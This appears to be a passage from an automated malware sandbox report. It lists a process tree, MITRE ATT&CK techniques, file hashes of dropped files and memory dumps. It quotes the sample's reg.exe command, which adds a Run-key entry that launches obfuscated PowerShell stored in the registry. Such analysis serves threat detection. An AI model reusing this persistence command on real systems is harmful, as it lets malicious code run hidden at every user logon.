    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2332
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udredende" /t REG_EXPAND_SZ /d "%Lossless% -windowstyle 1 $Sourish=(gp -Path 'HKCU:\Software\Trains40\').Chromoplast167;%Lossless% ($Sourish)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:908

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Network Service Discovery

1

T1046

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Delicat.Enk

Filesize
462KB

MD5
2b24db713797e91396a5bc619e49e7b2

SHA1
eff7dec19c43df6e204a32806893318469a2b103

SHA256
d28947b99be94a4ef690b2e3e97c2c930c16ccb0249a4916b359ba4e4fc61918

SHA512
2f1373d4c43f352c5fa495381da3b6fe1eb7ea8bfc6269760776194cbc82bdaf3cadbaf69f634b234686b2a162e786d5aa676a3332da95ee8e32210d8d7a9519

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3T8153NRIFW06E1Q812S.temp

Filesize
7KB

MD5
3a281812d280b0f7cbc5c83c9b932fd5

SHA1
9408fc6048e6094107dbbaa90dbd2e3f0e71b216

SHA256
a6a9ad29248e3f9d197b2259cff36b7317ed04372975ba88bb7810f4e0dbd9aa

SHA512
95925409e54e9cb09a5f911fd08bffff03004b49a4ab71038dfb9d9bd791d545fafde7152a8491b2af367e2311239aca20f7257bc0ab5ab114df7d2597fb3c73

Download Submit
memory/2096-4-0x000007FEF683E000-0x000007FEF683F000-memory.dmp

Filesize
4KB

Download
memory/2096-6-0x00000000027D0000-0x00000000027D8000-memory.dmp

Filesize
32KB

Download
memory/2096-5-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

Filesize
2.9MB

Download
memory/2096-7-0x000007FEF6580000-0x000007FEF6F1D000-memory.dmp

Filesize
9.6MB

Download
memory/2096-9-0x000007FEF6580000-0x000007FEF6F1D000-memory.dmp

Filesize
9.6MB

Download
memory/2096-8-0x000007FEF6580000-0x000007FEF6F1D000-memory.dmp

Filesize
9.6MB

Download
memory/2096-12-0x000007FEF6580000-0x000007FEF6F1D000-memory.dmp

Filesize
9.6MB

Download
memory/2732-30-0x0000000000B70000-0x0000000001BD2000-memory.dmp

Filesize
16.4MB

Download
memory/2844-16-0x0000000006650000-0x0000000007CBB000-memory.dmp

Filesize
22.4MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads